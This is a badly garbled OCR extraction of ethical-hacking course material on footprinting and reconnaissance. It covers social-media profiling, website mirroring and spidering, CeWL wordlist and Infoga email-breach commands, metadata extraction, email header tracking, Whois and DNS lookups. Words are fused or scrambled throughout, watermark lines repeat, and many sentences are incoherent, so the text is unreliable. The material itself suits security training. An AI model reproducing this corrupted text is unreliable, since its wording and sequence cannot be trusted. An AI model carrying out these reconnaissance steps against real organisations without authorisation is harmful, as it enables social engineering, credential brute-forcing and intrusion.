potential
partners,
websites,
thecompany.
suchas and
ical andCountermensores
Mackin ©by E-Comel
Copyright
Foran attacker, socialnetworking sitescan bevaluable s ourcesofinformation about thetarget
or
person organization.
Thereare no barriers
networking
The
attacker
forattackers gather
information
can only
that
posted
by
the
to accessthe public
is individuals.
pagesof accounts createdon social
sites. To obtain more informationabout the target,attackersmay create fake
accounts and use socialengineeringtechniques to lure the victim into revealing more
information.Forexample,
account;if thevictim accepts can
send
theattacker
afriendthe a
therequest,
of the targetpersonon that website.
request
thentheattacker
to targetperson from fake
can accesseven the restricted
pages
WhatUsersDo WhatAttacker
Gets
Maintainprofile Contactinfo,location,
andrelatedinformation
Connectto friends,
chat info,and relatedinformation
Friendslist,friends’
photos
Share andvideos Identity members,
of family interests,andrelatedinformation
Play
games,join groups Interests
Createevents Activities
Table 25:Activites of
Likeindividuals,
users
alsouse socialnetworking
organizations
sts
onthesodanetworking andtherespective
sitesto connect with people,
promote
information
their products, and gather feedbackabout their productsand services. The activities of an
organization o n socialnetworking sites and the respective
informationthat an attackercan
collectare summarized in the tablebelow,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Organizations
‘What Do WhatAttackerGets
Usersurveys Business
strategies
Promoteproducts profile
Product
Usersupport Socialengineering
Recruitment Platform/technology
information
Background
checkto hire employees Type
of business
‘Table
2.6:of on
the
social
sites
Actes
and
theorganization networking the respactve
information
ical andCountermensores
Mackin ©by E-Comel
Copyright
GeneralResourcesfor Locating
Informationfrom Social
Media Sites
|G Atacerstracksocial
media
sites using
to dscover
most shared
contentUsing
hashags track
or keywords,
accounts
‘tacks ue thsinformation
to parton
soil
phishing, andother
engineering,
search f indsthemort
engine
Shared
contentor tpl,
GeneralResourcesfor Locating
Informationfrom SocialMedia Sites
Severalonlineservices andresources are availableto
fromone or more socialmediasites.These gather
valuable informationabouta target
services allowattackers
content across socialmediasites byusinghashtags or keywords,
to discovermost shared
track accounts andURLson
mediasites,obtaina target’s
various social emailaddress, etc.Thisinformationhelpsattackers
to performphishing, socialengineering,andather typesof attacks.
Attackersuse tools suchas BuzzSumo, Google Trends,Hashatit,and Ubersuggest to locate
information
=
on socialmedia
BuzzSumo
sites:
Source:https://buzzsumo.com
BuzzSumo's advancedsocialsearchenginefindsthe most sharedcontent for a topic,
author,or domain,It showsthe sharedactivityacross all the majorsocialnetworks
including Facebook,
Twitter, Linkedin,
Google Plus,
andPinterest.
showni n the screenshot,
‘As attackersuse BuzzSumoto trackthe most sharedcontent
relatedto the targetdomainandobtaindetailssuchas socialmediaaccount information,
andemailaddresses.
URLs,
ical andCountermensores
Mackin ©by E-Comel
Copyright
2.39:Sereenshot
Figure
showing
ofBuzzSumo theshared
content
2
Module 166
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
LocationSearchon SocialMediaSites
Conducting
opm
gang deport aes
ical andCountermensores
Mackin ©by E-Comel
Copyright
Toolsfor Footprinting
through
SocialNetworking
Sites
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Attackers
use thiscommandto
a user
on
search target
mediaplatforms
social
F
Not
Wot Found
Not Found
Figure showing
2.41;Screenshot theresult
ofSherlock
tool
2
Module 170
Page tical andCountermensores
Making by Comet
Copyright©
Social
Searcher
Source:https://www.social-searcher.com
SocialSearcherallowsattackersto searchfor content i n socialnetworksi n real time and
deepdata.this
networking tool
provides analytics Attackersuse to tracka targetu seron
sites and obtaininformationsuchas complete
andotherpersonal
postings, information,
various
social
URLsto their profiles, their
Figure
242:Screenshot
ofSocalSearcher
showing
usercontent
on
socalnetworks
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebsiteFootprinting
‘acu
Burp
ute, apron,Wappsie,
]
Website Footprinting
(Cont'd) CEH
SSSR
|SCUM ||SESE
Website Footprinting
So far,we have discussedfootprinting through search engines,web services, and social
networking
sites.will website
first place organization's
website
Hereafter, we discuss footprinting.
An isthe
to getsensitive informationsuchas names andcontact detailsof the leadersof the
upcomingprojectdetails,
organization, andso on.
2
Module 172
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
section covers the websitefootprinting
‘This mirroringwebsites,
concept, website
extracting
informationand links,gathering metadataof publicdocuments,
wordlists,extracting and
monitoring web updates andwebsitetraffic.
Websitefootprinting refersto monitoring and analyzing a targetorganization's websitefor
information.An attackercan build a detailed mapof a website'sstructure and architecture
theIDSor arousingthe suspicionof any system
without triggering administrator.Attackersuse
sophisticatedfootprinting
toolsor the basictoolsthat come with the operatingsystem, suchas
a
Telnet,or browser.
TheNetcrafttool can gather websiteinformationsuchas IP address, registered
name and
of OS
addressof thedomainowner, domainname, host the site,and details. However, thetool
maynot give all thesedetailsfor everysite. In suchcases,the attackercan browsethe target
website.
thetargetwebsitewill typically
Browsing providethefollowinginformation:
Software
‘=
usedandits version:Anattackercan easily
findthe software
andversion in use
on an off-the-shelfsoftware-based
website.
Operating used:Usually,
system theoperating
system
i n use can alsobedetermined.
Sub-directories
andparameters:Searches
can reveal
thesub-directories
andparameters
bymaking whilebrowsing
a note of the URLs the targetwebsite.
Filename,path, databasefield name, or query:Theattackerwill often carefully analyze
anythingafter2 querythat lookslike a filename, path,databasefieldname, or queryto
checkwhetherit offersopportunities for SQLinjection.
Scripting
one can easily Withofscript
platform: thehelp
determinethe scripting
filename
platform
extensions suchas .php,
or
.asp, isp,
that the targetwebsiteis using.
Technologies Used: Byinspecting the URLsof the targetwebsite, one can easily
determinethe technologies
(.NET,
J2EE, etc.)usedto buildthat website,
PHP,
ContactdetailsandCMSdetails:Thecontact pagesusually offer detailssuchas names,
phone numbers, email addresses,and locationsof admin or support personnel. An
attacker
use
to details
the social
can
URLrewriting engineering
attack.
these
software
to perform
disguisescript
CMS
filenameextensionsif theattackeris willing
efforttowarddetermining
additional platform.
the scripting
allows
to devote
use Burp
‘Attackers Suite,Zaproxy,
WhatWeb,
BuiltWith,
Wappalyzer,
andWebsiteInformerto
that provide:
view headers
=
Connection
content status and
andLast-Modified
Accept-Ranges information
type
=
X-Powered-By
information.
Webserver i n use andits version
ical andCountermensores
Mackin ©by E-Comel
Copyright
Burp
Suite
Source:https://portswigger.net
BurpSuite is an integrated platform for performing securitytestingof web applications.Its
various toolsworktogether to supportthe entire testingprocess, frominitialmappingand
analysisof a n application's
attacksurfaceto finding andexploitingsecurityvulnerabilities.
BurpProxy a llowsattackers
targetwebapplication
application-related
t o all and
intercept requests responses between the
browser
andthe
andobtaininformationsuchas webserver used,its version, andweb-
vulnerabilities.
Fora
Sram Pas
‘ee
[ews
_)
[re]
(awa
Websitefootprinting
of
can be performed
2.43:
Figure Screenshot
BurpSuite
byexaminingHTMLsource codeandcookies.
‘=
HTMLsource
the
Examining
gather
Attackerscan
code
sensitive informationbyexaminingthe HTML source codeand
following
comments
the
comments
The
provide
arewhat
provide manually
clues
may thoseCMS
that
creates.
background.
may
inserted
as to is runningi n the
contact detailsof thewebdeveloper
or administrator.
or that the system
They even
file structure.
will
Observeall the linksandimagetagsto mapthe system
ical andCountermensores
Mackin ©by E-Comel
Copyright
Examining
Cookies
2.44: sou
Figure Screenshotshowing
HIML
2.45:Screenshot
Figure showingcookies
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebsiteFootprinting
using WebSpiders
‘eae
orton
end raed by et
WebsiteFootprinting
usingWebSpiders
A web spider
browses
(also
websites
knownas
in a methodical
andemailaddresses.
webcollect
manner to
crawleror web robot)
specific
is a program or automatedscript
information
suchasemployee
Attackersthen use the collectedinformationto perform
that
names
footprinting and
socialengineeringattacks.Web spidering failsif thetarget
websitehasthe robots.txtfile i n its
root directory
with a listing
of directoriesto preventcrawling.
Attackerscan uncover all the filesandweb pages on the targetwebsitebysimply feeding the
web spider
andanalyzes
witha URL.Then, the web
spider
sendshundreds
the HTMLcadeof all the receivedresponsesfor identifying
rnew linksare found, thenthe spider
to
of requeststhe targetwebsite
additionallinks.If any
addsthemto the targetlist andstarts spidering and
analyzingthe newly discoveredlinks.Thismethodhelps attackersto not onlydetectexploitable
web pages,and filesthat makeup the
surfacesbut alsoto find all the directories,
‘web-attack
target
website,
Spidering
User-Directed
Attackers,
i n some cases,use a more sophisticated technique for spideringthe target
website
Insteadof usingautomatedtools.They u se standardwebbrowsers to walkthrough the target
‘website
Whileperforming to
in a n attempt navigate through allthefunctionalitiesprovided
this task,the resulting
monitoredand analyzed
bythewebapplication
incomingand outgoingtrafficof the websiteis
bythe tools that includefeaturesof both a web spider and an
intercepting proxy.Further,
URLsvisited bythe browser.It alsoanalyzes
mapwith thediscovered
of
thesetoolscreate a map the webapplication
the responsesof the application
content andits functionalities.
Attackers
ofallthe
consisting
and updates
use toolssuchas Burp
the
Suite
andWebScarab to perform user-directedspidering
ical andCountermensores
Mackin ©by E-Comel
Copyright
Webspidering toolssuchas WebDataExtractor, andSpiderFoot
ParseHub, can collectsensitive
informationfromthe targetwebsite.
=
Webbata Extractor
Source:http://www.webextractor.com
Web Data Extractorautomatically extracts specific
informationfrom web pages.It
extracts targeted phone,
contact data(email, andfax)fromthe website,extractsthe URL
keyword)
and meta tags(title,description, for websitepromotion,searches directory
web research,
creation, performs andso on.
showni n
‘As the screenshot, gather
attackersuse WebData Extractor to automatically
criticalinformationsuchas listsof meta tags,e-mailaddresses,and phone
and fax
numbersfromthe target website.
2.46:Screenshotof
Figure WebDataBxractor
ical andCountermensores
Mackin ©by E-Comel
Copyright
EntireWebsite
Mirroring
youteto
web
Siondowland
EntireWebsite
Mirroring
Websitemirroring
duplicate
websites
is
of
the processof creating
usingmirroringtoolssuchas HTTrack
a replica
or clone the original
WebSiteCopier
Thesetoolsdownloada websiteto a localdirectory
andNCollectorStudio.
and recursively
website.Usersc an
=
Itis
It
helpful
for
offline browsing
site
enablesan attackerto spend
m ore time in viewing and analyzing
the websitefor
andloopholes
vulnerabilities
=
It helpsi n finding structure and other valuableinformation
the directory from the
mirroredcopy without multiple
requests to thewebserver
Attackerscan use this informationto perform
various web application
attackson the target
organization's
website.
Mirroring
‘Website WebSiteCopier
Tool:HTTrack
Source:http://www.httrack.com
utility.
HTTrackis
and recursively websiteto
an offlinebrowser It downloads
a fromtheInternet a localdirectory
HTML,images,andotherfilesfromthe web
buildsall the directoriesincluding
server
computer.
on another
As showni n the screenshot, attackersuse HTTrackto mirror the entire websiteof the target
organization,store it i n the localsystem drive,andbrowsethe localwebsiteto identify possible
exploits
andvulnerabilities.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Mirroring
target
website
Figure
2.47:
of
Track
Screenshot Web
2
Module 179
Page tical andCountermensores
Making by Comet
Copyright©
WebsiteInformationfrom https://archive.org
Extracting
(©InvernetArchive's
Wayback
Machine
allows one tovit archived
of
versions webster
ical andCountermensores
Mackin ©by E-Comel
Copyright
ss
ORME
[caren]
Uk
Auntaninianenene
Pt sl
248:
Figure Screenshot showing
ofArchive archived
versions ofmicrosoft.com
Now$799
Figure2.49:
Screenshot
ofArchive
showingarchived
webpages
ofmicrosoft.com
2
Module 381
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
WebsiteLinks
Extracting
Netpeak
Cctoparse, and UnkEaton
spider, to
WebsiteLinks
Extracting
Extracting
a target of
websitelinksis an important
websiteto determine
part website footprinting,
i ts internal
attackercan find out the applications,
andexternallinks.Using
web technologies,
wherean attackeranalyzes
thegathered information,
an
andother relatedwebsitesthat are
linked to the targetwebsite.Further, dumping the obtainedlinkscan reveal important
helps andURLs
of such
connections extract
as and
attackersto identify
application
CSS
Thisotherresources
vulnerabilitiesi n the target
JavaScript files. information
websiteandfind ways to exploit
theweb
*
Octoparse
Source:https://www.octoparse.com
Octoparse as it quickly
offersautomatic dataextraction, scrapeswebdatawithout coding
andturns webpagesinto structured
data.As showni n the screenshot,attackersu se
Octoparse
code. to informationfrom
capture
webpages,
suchas text, links,
image URLs,
or html
ical andCountermensores
Mackin ©by E-Comel
Copyright
- ee
Figure
250:Screenshot
ofOctopase
ofOctoparse
251:Screenshotshowing output
Figure
ical
Mackin
and
Countermenso
Copyright
by © E-Comel
Wordlistfromthe Target
Gathering Website
ro ee
brutefor
Spldering.
‘wordfromthetarget
webste
‘the
words
wobste:
avalabeon thet
@Q
Wordlistfrom the Target
Gathering Website
Thewordsavailableon the targetwebsitemay revealcriticalinformationthat helps attackersto
performfurtherexploitation. Attackersgather a list of emailaddresses relatedto the target
usingvarious searchengines,socialnetworking
organization sites,webspidering tools,etc. After
obtaining
theseemail addresses, can gather
an attacker a list of wordsavailableon the target
website.Thisinformationhelps the attackerto perform brute-forceattackson the target
An attackeruses the CeWLtool to gather
organization. a listof wordsfromthe targetwebsite
andperform a brute-forceattackon the emailaddresses gathered earlier.
=
CeWL
To run the
tool,
ruby cewl.rb
issue
--help
the following
commands:
This
command
various
the target that
auser alist
website. ofwords
displays options can use to obtain from
cewl www.certifiedhacker.com
This
command
cewl
alist
of inthe
target
URL.
returns unique
wordspresent
--email www.certifiedhacker.com
website
In thiscase, the target is www.certifiedhacker.com, and the ‘--email’
optionis usedto fetcha list ofwordsandemailaddressesfromthe target
website.
ical andCountermensores
Mackin ©by E-Comel
Copyright
@parrot
‘eoul_www.certifredhacker
com
Kew. 5.4.4c1 (Arkanoid) Robin Wood (robingdigi.ninja)
(https://digi
ninja/)
K
ide
Screenshot
Figure252:
showing results
obtainedfromCeWLtoo
2
Module 185
Page tical andCountermensores
Making by Comet
Copyright©
Metadataof PublicDocuments
Extracting
sett the
information mayresdeon targetorganizations
se
metadata
Webextraction
Ost
‘rackets
Ertoo, and
tos, such& Metagof
Extractor toextractm etadata
a ndden
=) Be
| pdpot
Metagoflextractsthemetadata
ofpublic
‘Metagootitdocument deel docxpts,
MetadataofPublic Documents
Extracting
Useful
information
Microsoft
Word
files, target
filesorganization's
website
mayresideon the
extractdata,
valuable including
andother in various formats.
metadataand hiddeninformationfrom suchdocuments.Thedata mainly
Attackers
in theformof pdfdocuments,
contains hidden
public
information analyzed
aboutthe documents
thatcan be to extractinformationsuchasthe
title of the page,description, creation/modification
keywords, dateandtime of the content, and
usernames ande-mailaddresses of employees
of the target
organization.
An attackercanmisuse this information to perform maliciousactivities againstthe target
bybrute-forcing
organization authenticationusing the usernames and e-mailaddresses of
employees,
or performsocialengineeringto sendmalware, whichcan infectthetargetsystem,
MetadataExtractionTools
Metadataextraction toolssuchas Metagoofil, Exiftool,
andWebDataExtractorautomatically
extract criticalinformationthat includesthe usernames of clients,
operating systems(exploits
are OS-specific), emailaddresses (possibly list of software(version
for socialengineering), and
type)used, listof servers, documentdatecreation/modification,
andauthorsof thewebsite.
=
Metagoofil
Source:https://code.google.com
Metagoofil
extracts metadataof public
belonging It performs
to a targetcompany.
documents
a Google documents
to identify
search
(pdf,doc,xls,ppt,docx,pptx,andxlsx)
anddownloadthe
to the localdiskandthen extracts the metadatawith differentlibrariessuch
Hachoir,
‘as PdfMiner, andothers.
ical andCountermensores
Mackin ©by E-Comel
Copyright
shownin the screenshot,
‘As Metagoofil
generatesa reportwith usernames,software
versions, and servers or machinenames, which helpsattackersi n the information
gathering
phase. b
metagoofitver 2.2
Christian Martorella
Edge-Securitycom
cnartorella_atedge-security.com
BlackhatArsenalEdition
11/501/vebhp2mt-en
Error downloading
/vebhp2ht=en
[27501/int\/en/ads
Error downloading
/intl/en/ads
[3/50] /services
Error dovnloading
/services
[4/501/int\/en/poticies/
for pdf files,
I-1 Searching vith a Limit of 200
Searching
100 results
Searching
200 results
Results: 34 files found
Bterting to dovnload50 of then
253:Screenshotof Metagoof!
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
OtherTechniques
forWebsiteFootprinting
(a acters ee web
Monitoring
Web
Pages
foran
and
Vuln or
ol, sucht WeSite-Watcher
updates motoring
Updates Changes
to dete changespds in
(0
Actacirs
copyrightweb
can sec
the
detaws
fo ln ar rvion rans ttm arcane to pre
“ocr
Website
se
Tralfic
Target
tools, Company
wate
afrmaton
about
tae
‘Monitoring
mnitorne chs
of
Other Techniques
for WebsiteFootprinting
‘=
Monitoring
WebPages for UpdatesandChanges
Attackers
monitor
website changes.
targetwebsitehelps the
the target
attackers
to detectwebupdates
to accessandidentify
pages,track changes
password-protected
and
changes
Monitoring
in the login
pages,extract
i n the softwareversion anddriver updates,
extract and store imageson themodifiedweb pages,andso on. Attackers analyzethe
gathered informationto detectunderlying
vulnerabilitiesi n the targetwebsite,
andbased
on thesevulnerabilities,
they perform ofthe targetwebapplication,
exploitation
WebUpdates
Monitoring
Tools
Webupdates tools are capable
monitoring of detecting
any changes or updates on a
particular andthey
website, can sendnotifications
or alertsto interestedu sersthrough
emailor SMS.
© WebSite-Watcher
Source:https://www.aignes.com
helps
‘Website-Watcher forupdates
to trackwebsites andautomatic changes.
When
update
‘an or change automatically
occurs,WebSite-Watcher detectsand saves the
lasttwo versions onto your disk.
shownin the screenshot,
‘As attackersuse WebSite-Watcher
to extract the olderand
newer versions of web pagesrelatedto the target
website
ical andCountermensores
Mackin ©by E-Comel
Copyright
258:Screenshot
Figure of Website
Watcher
For
this
can exploit information
example,
on company.
to launchfurtherattacks the target
following company's
attackerscan searchfor the informationon the
website:
Company numbers,
contact names,phone andemalladdresses
Company
locationsandbranches
Partner
Information
News
Linksto othersites
Product,project,
or service data
ical andCountermensores
Mackin ©by E-Comel
Copyright
Searching
forWebPages PatternsandRevisionNumbers
Posting
Copyright provided
mechanism
is a protecting bythelawof a country,
whichgrantsthe
creator of an original
workexclusiverights
for its use anddistribution.To restrict third
their data freely,
partiesfrom accessing ensure that there is
most organizations a
Copyright
notice on everysingle pieceof their published
work,
copyright
A typical notice contains thefollowinginformation:
TheCopyright Symbol
©. The
Year
‘The
of
of Creation
Name theAuthor
9
ARights Statement
attacker
‘An
a deep
can search
analysis
forcopyright
of the targetorganization.
therevision numberofa product.
Further, to
noticeson the webanduse thesedetails perform
attackerscan searchandnote down
Therevision number is a uniquestringthat actsas an
identifierforthe revision of a given document, andit can befoundwithinthedocuments
ofthecompany.
can alsosearch
‘Attackers forthedocument numbers
to
thatare assignedthedocuments
after revision, whichcan besearchedfromthe Internetandrecordedto launchfurther
attacks o n the target.
WebsiteTrafficofTarget
‘Monitoring Company
can monitor a targetcompany’s
‘Attackers websitetraffic using toolssuchas Web-Stat,
Alexa,collect
valuable
information.
tools
andMonitisto
help
about the target’s
customers
collect
customer base,
These to
which helpattackersto disguise
and launchsocialengineering
attackso n the target.
information
themselvesas
Theinformation
collected
includes:
©.
Total
visitors:
browsingTools(https://clicky.com) number
suchasClicky
the target
website. of findthetotal visitors
2.55:Screenshot
Figure ofAlexa
ical andCountermensores
Mackin ©by E-Comel
Copyright
Email Communications
Tracking
the
racers
of
delivery
emails
to
ack eit
an
‘Rese
gather
s ucha
‘ecilen IP adeese,
formcal engineering
and
Qe
Email Footprinting
footprinting
So far,we have discussed searchengines,footprinting
through usingGoogle,
footprinting
social
networking
sites,
footprinting. website will email
through
This section describes
informationfromemailheaders,
and footprinting.
Now,we
how to trackemailcommunications,
andemailtracking
tools.
discuss
how to collect
Email Communications
‘Tracking
Emailtracking
‘through
digitally
time-stamped of is
monitors theemailmessages a particular user. Thiskindof trackingpossible
recordsthat revealthe time anddatewhenthe target receives
andopensa specific
IP addresses,
to builda hacking
thisinformation
tools to
collect
information
email,Emailtracking allowan attacker
mailservers, andservice providers
involvedi n sending
andto perform
strategy
suchas
theemail.Attackerscan use
socialengineeringandotherattacks.
Examples
of emailtracking
toolsincludeeMailTrackerPro,
Infoga,
andMailtrack.
=
System
gathered
Informationaboutthe victim
Recipient's Allowstracking
IPaddress:
tools
usingemailtracking includes:
oftherecipient's
IP address
*
Geolocation:
Estimates and displays
the locationof the recipient
on the mapand may
calculatethedistancefromthe attacker'slocation
even
ical andCountermensores
Mackin ©by E-Comel
Copyright
Operating
System andBrowserinformation:Revealsinformation aboutthe operating
systemandthe browserusedbythe recipient.
Theattackercan use thisinformationto
findloopholes
i n that version of the operating
systemandbrowser
to launch
further
attacks
ForwardEmail:Determines whetherthe emailsent to the user is forwardedto another
person
DeviceType: Providesinformationaboutthe typeof deviceusedto open andreadthe
email,
e.g.,desktop computer, mobiledevice,or laptop
Path
Travelled: emailemail
transfer
Tracks
agents
the paththrough
fromsource to destinationsystem
whichthe traveledvia
of
takenby
Eachemailheaderis a usefulsource information
the target.The processof viewingthe emailheader
varies with differentemailprograms.
Commonly usedemailprograms:
=
Client
eM Spike
=
Mailbird
Lite ClawsMail
ThunderbirdSmarterMail
Webmail
=
Hiri
=
Mozilla
Theemailheadercontains the following
information:
Outlook
Sender's
=
mail originator’s
server
bythe
Dateandtime of receipt emailservers
=
Authentication
system by
used the mailserver
sender's
Data
=
time
Aunique
of sending
and
number
the message
assigned
bymx.google.com
to identify
the message
=
‘=
full
Sender's
Sender'sIPaddress
name
andaddress fromwhichthe message
was sent
byperforming
Theattackercan trace andcollectall this information of the
a detailedanalysis
complete
emailheader.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Date
time
by
f=)
ad received
=
the emai
eres
exgintors
. _S~Sender's mail
server
(Gaceenamine
nant
——
bys
patentcationem
sanded
aed
m al lserver
Jsenderstuitname
Figure showing
2.56:Screenshot detailed
analysis
oftheemailheader
2
Module 196
Page tical andCountermensores
Making
byComet
Copyright©
Tools
Email Tracking
| eMaitracartro
anaes emai a ndrevealsinformation,
headers sch a sender’
geographical
IP
eationand addess
Email Tracking
Tools
Emailtracking
toolsallowan attackerto track an emailandextract informationsuchas sender
identity,
mailserver, sender’s location,andso on. Thesetoolssendnotifications
IP address,
automatically openthe mailandprovide
whenthe recipients status informationaboutwhether
the emailwas successfully
targetorganization's
systems delivered
or
bysendingnot. extracted
information
Attackers
malicious the
use the
emails
to attack
+
Infoga
Source:https://aithub.com
2 report
was
using
if an email leaked
pythoninfoga.py --domain
thehaveibeenpwned.com
../microsoft. txt
microsoft.com API. the
For example,command
--source all --breach -v
will retrieve all the publicly available email addressesrelated to the domain
microsoft.com along withemailaccount information.
python infoga.py mé110k¢protonmail.com
../mélik.
--info --breach -v 3
report txt
willemail
account
information
Theabovecommand retrieve
specified
address fora email
ical andCountermensores
Mackin ©by E-Comel
Copyright
eMailTrackerPro
Source:http://www.emailtrackerpro.com
shownin the screenshot,
‘As attackersuse eMailTrackerPro to analyze
emailheadersand
extract informationsuchas the
sender’s
geographical location,IP address,
allowsan attackerto review the traces laterbysaving pasttraces.
andso on. It
Pe a
Figure2.8:Screenshot
ofeMairackerro
ical andCountermensores
Mackin ©by E-Comel
Copyright
Whois Lookup
‘Waste
query return
Regional
Internet Registries
‘auRs)
Whois Lookup
(Cont'd)
Whois Footprinting
Gathering
network-relatedinformation such as “Whois―
information about the target
organization an attack. In this section,we will discuss
is importantwhen planning Whois
footprinting, i n gathering
whichhelps domaininformationsuchas informationregarding
the
owner of an organization,
its registrar, details,its
registration and contact
name server,
information.Whoisfootprinting o n how to perform
focuses a Whoislookup,
analyze the Whois
ical andCountermensores
Mackin ©by E-Comel
Copyright
lookup andfindIP geolocation
results, as well as the toolsusedto gather
information, Whois
information.
Whois Lookup
Whoisis a query and responseprotocol usedfor queryingdatabases that store the registered
Usersor assignees of an Internet resource, suchas a domainname, an IPaddressblock,or an
autonomous system. This protocol listensto requests o n port 43 (TCP). Regional Internet
Registries(RIRs)maintain Whois databases, whichcontain the personal information ofdomain
owners. For eachresource, the
information(creation andexpiration
Whois
resource itselfandrelevantinformation
databaseprovides
regarding
dates).
text records
assignees,
with informationaboutthe
registrants,andadministrative
‘=
set
particular of data.
-
Whois
Thin only
Stores
Whois
server
the name of the of of a domain,
theregistrar which
holds
in turn
complete onthe details databeing
lookedup.
‘Whois
the
following
name
+
queryreturns
Domain
information:
details
details
*
name
+
Contact
Domain
of thedomainowner
servers
+
NetRange
+
Whena domainhasbeencreated
+
Expiry
records
+
last
Recordsupdated
attackerqueries a Whoisdatabase
‘An server to obtain information aboutthe targetdomain
responds of
name, contact details its owner, expiry date,
to the querywith the requested
create a mapof the organization's
creation date,
information.Using
network,
and so on, andthe Whoisserver
thisinformation,
an attackercan
misleaddomainowners withsocialengineering,
and
thenobtaininternaldetails
Regional
Internet
of the
Registries(RIRs)
network.
TheRIRsinclude:
=
ARIN(American
Registry (https://www.arin.net)
for InternetNumbers)
=
NetworkInformationCenter)
(African
AFRINIC (https://www.afrinic.net)
=
Pacific
APNIC(Asia NetworkInformation (https://www.apnic.net)
Center)
RIPE(Réseaux NetworkCoordinationCentre)
IPEuropéens (https://www.ripe.net)
LACNIC(Latin and
American Caribbean
Network I Center)
nformation
(https://www.lacnic.net)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Lookup
‘Whois Result
Whoisservices suchas http://whois.domaintools.com
or https://www.tamos.com
can helpto
perform Whois lookups.
Thescreenshotshowsthe result analysisof a Whoislookup
obtained
Whoisservices. Theservices perform
with the two above-mentioned Whoislookupbyentering
the
target's
domain
address.
domaintools.com
as registrant
or
service Whois
provides
IP
information, such
information
The
email,administrativecontact information,
creation andexpirydate,
a including
about an IP address,
hostname,
province, city, phone
number,
informatio
and list ofdomainservers. SmartWhois,availableat http://www.tamos.com,
or domain,
fax number,
information
gives
aboutthe country,
name of the networkprovider,
state or
administrator,
and
technical supportcontact information.It alsohelpsi n finding
the owner of the domain,
the
owner'scontact information,the owner of the IPaddressblock, registered
dateof the domain,
and so on. It supports DomainNames(IDNs),
Internationalized whichmeans one can query
domain
names that use non-English
IPv6
It alsosupports addresses,
characters.
WhoisRecordfor CertifiedHacker.com
Figure
2.59:
of Sereenshot
ical
Whols
andCountermensores
Mackin ©by E-Comel
Copyright
2.60;Screenshotofsmarts
Figure
Attackersu se Whoislookup tools suchas BatchIP Converter,WholsAnalyzer Pro,and
‘ActiveWhois
information,
DNS
records,
including
country,
city,
and or
to extract informationsuchasIPaddresses,
state,
service providers,administrators,
the
hostnames domainnames,registrant
phone
andfaxnumbers,
and technicalsupportinformation, network
for any IP addressor
domainname.
ical andCountermensores
Mackin ©by E-Comel
Copyright
IP GeolocationInformation
Finding
1@Ieeolocaton
teglon/state tocode,
cy, 2P/posala5
h elps ident information,
sch county
(hosting
company),
time tne, connection
IP
Speed, dain name 10D country
oe, area code,
modicare, Anderton
Location
Finder,
to in
shoutthe wich
target,intra
information
hep colt geolocation
hep attackers
auncing
IP GeolocationInformation
Finding
IP geolocation helps
to obtaininformationregarding region/state,
a targetsuchas its country,
city,latitudeandlongitudeof itscity,ZIP/postal
code,time zone,connection speed,ISP(hosting
company), domainname, IDDcountry
cartier, andelevation.
area code,
code,
weather
station codeandname, mobile
ical andCountermensores
Mackin ©by E-Comel
Copyright
IPAddress
country
city
Coordinates
of
city
\sP
LocalTime
Domain
Net Speed
&
100 Area Code
ZIP
Code
WeatherStation
Figure2.61:
of
Screenshot
IP2Location
2
Module 202
Page tical andCountermensores
Making Copyright©
by Comet
DNSInformation
Extracting
DNSFootprinting
Aftercollecting
Whoisrecordsaboutthe target,thenext phase
in the footprinting
methodology
isDNS footprinting.
DNSrecords,
Attackersperform DNSfootprintinggather
to
informationabout
andtypesof servers usedbythe targetorganization.
attackersto identify
thehostsconnectedi n the targetnetworkandperform
DNS
servers,
Thisinformationhelps
furtherexploitation
on thetargetorganization.
Thissection describeshowto extract DNSinformation, performthe reverse DNSlookup,
and
collectinformationfromDNSzone transfers,
as well as DNSinterrogation
tools.
DNSInformation
Extracting
DNSreveals information
footprinting
names,
names, computer DNS a about zonedata.DNSzone dataincludeDNSdomain
andmuchmore informationabout network.An attacker
IP addresses,
Uses DNSinformationto determinekeyhosts in the network and then performssocial
gather
engineeringattacksto even more information.
footprinting
DNS helpsdetermining
RecordType
infollowing
about
the records
Des
the targetDNS:
A Pointsto a host'sIPaddress
Mx Pointsto domain's
mailserver
NS
CNAME
tonaming
Points host’s
name
allows
Canonical
aliases
server
to a host
SOA Indicateauthority
for a domain
SRV Servicerecords
ical andCountermensores
Mackin ©by E-Comel
Copyright
PTR MapsIPaddress
to a hostname
Responsible
person
Hostinformation
recordincludes
CPUtypeand OS
Unstructuredtext records
Table 27:ONS
records
andtheirdeseription
DNSinterrogation tools suchas Professional Toolset(httos://tools.dnsstuff.com) and DNS
Records(https://network-tools.com) enablethe user to perform DNSfootprinting. DNSstuff
(Professional Toolset) extracts DNSinformation aboutIPaddresses, mailserver extensions,
DNS
lookups, Whoislookups, and so on. It can extract a range of IP addressesusing an IP routing
lookup. Ifthetargetnetworkallowsunknown, unauthorized users to transferDNSzone data,
then it is easy for an attackerto obtainthe informationaboutDNSwith the helpof the ONS
tool,
interrogation
Whenthe attacker queriestheDNSserver usingthe DNSinterrogation
tool,the server responds
DNS.DNSrecordsprovide
with a recordstructure that contains informationaboutthe target
importantinformation aboutthelocationandtypesofservers.
regen
tea em eerie
—EB
Figure
262:Screenshot
ofProfessional
Toolset
alsouse DNSlookup
‘Attackers toolssuchas DNSdumpster.com, Bluto,and DomainDossierto
retrieve DNSrecordsfor a specified
domainor hostname. Thesetoolsretrieve informationsuch
{asdomainsandIPaddresses, domainWhoisrecords,DNSrecords, andnetworkWhoisrecords.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ReverseDNSLookup
ReverseDNSLookup
DNSlookup
operation a
is usedfor finding
is performed
the IPaddresses for given domainname, andthe reverse ONS
to obtainthedomainname of a givenIP address.
for a domainand typethe domainname i n the browser,
Whenyou are looking
the ONSconverts that domainname
address
into a n IP
forwardsand
name into an IPaddress
the request
i s performed
for further processing.
a
Thisconversion of domain
bya record.Attackersperform a reverse DNSlookupon
Attackers
a such
the IP rangeto locate DNSPTRrecordfor
usevarious toolssuchas DNSRecon
IP addresses.
andReverseIP DomainCheckforperforming the
reverse DNSlookup on the target or a range of IPaddresses,
host.Whenwe getan IPaddress we
can use thesetoolsto obtainthedomain name.
=
